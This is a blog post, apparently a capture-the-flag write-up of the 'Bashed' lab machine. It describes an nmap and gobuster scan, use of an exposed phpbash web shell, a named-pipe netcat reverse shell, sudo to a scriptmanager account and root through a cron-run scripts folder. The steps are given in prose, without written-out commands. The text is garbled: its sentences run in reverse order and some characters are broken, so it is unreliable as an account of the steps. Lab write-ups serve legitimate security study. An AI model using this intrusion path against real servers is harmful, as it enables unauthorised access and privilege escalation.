Contents of /scripts directory Scriptmanager script to write to test.txt It had one python script that appeared to be writing to a text file in the same folder. Using our sudo permissions to run commands as the scriptmanager user, I checked the contents of this folder. Root directory showing folder owned by scriptmanager user However, I did find a folder in the root directory called “scripts” that was owned by the scriptmanager user. I transfered the LinEnum script over to the machine through netcat and ran it, but it didn’t give much useful information. Interestingly, this shows us we can sudo anything with no password needed as long as we run the command as the scriptmanager user. Ok, so now we have a shell on the machine, but only as Sudo permissions for www-data user Catching reverse shell from www-data user When combining the two commands above with a netcat listener on my machine, I got a reverse shell as the www-data user. Creating reverse shell without netcat -e functionality I found an article from SANS on this exact subject that provided steps on how to create a new named pipe for use with netcat that essentially functions the same way as ‘-e /bin/bash’ without actually doing so. The normal method of using netcat to connect to a listener on my machine and using the -e flag to execute bash did not work, so I had to find another way. This opens up some possibilities, but the first thing we need is an actual reverse shell to the machine for ease of access. Functional web shell found in /dev directory It looks like phpbash.php is the web shell we were looking for and allows us to run commands on the server directly from the browser as the www-data user. If that’s the case, ‘phpbash.php’ should be a fully functional web shell for this server. This looks to be where the user was testing their project. When investigating /dev I found the same two files as were listed on the github page: and phpbash.php. I ran gobuster to enumerate other directories and found a few promising ones, most notably the /dev directory. Looking around the blog and github page suggested the owner of the blog developed a web shell and had tested it on the same server the blog is hosted on. Blog home page Blog entry about the ‘phpbash’ project, a web shell on github Looking into the website itself, it appears to be a blog for someone tracking the development of a web shell project, even including a link to a github page. It showed only one port open, HTTP on port 80. Web shell > User shell (www-data) > User-shell (scriptmanager) > root shellĪs usual, I started with an nmap scan of the IP.Below is a rough outline of the path I took. I liked this one and can see why I had issues with it last time as I ended up needing to bounce between multiple accounts and shells to eventually get root. Once we use this to get access to the machine, we find a /scripts directory that seems to run every file in it as root every so often and creating a file here leads to the eventual privilege escalation. The blog is about a web shell that was developed by the author of the blog and seems to be in use on the server itself, possibly for testing as it’s in the /dev directory. The last box I didn’t get root access on the first time I tried is Bashed, a Ubuntu Linux web server being used for what appears to be a personal blog.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |